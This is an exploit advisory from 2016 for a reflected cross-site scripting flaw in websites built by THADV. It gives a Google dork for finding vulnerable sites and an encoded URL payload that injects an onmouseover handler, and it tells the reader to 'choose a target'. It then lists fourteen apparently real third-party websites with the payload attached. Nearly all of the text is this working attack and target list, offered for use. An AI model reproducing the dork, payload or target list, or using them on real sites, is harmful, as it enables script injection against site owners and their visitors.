|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Design by THADV Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://thadv.com/
|[+]
|[+] Google Dork: intext:"Design by THADV" inurl:mobile/index.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2016 23 January
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork, choose a target then add "%F6%22%20onmouseover=prompt%28992148%29%20//" after URL!
|[+] Now, by crossing mouse on a link in page you can see the alert.
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://www.117.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.hwananfoods.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.chwm3d.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://oiltea.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://meishu.com.tw/wap/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.baotian.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.jhc888.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://chyu2.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.summerland.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.similar.com.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://hicar.imobi.tw/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.thadv.com/advmobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://www.udc.tw/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|[+] http://yghoist.com/mobile/index.php/%F6%22%20onmouseover=prompt%28992148%29%20//
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|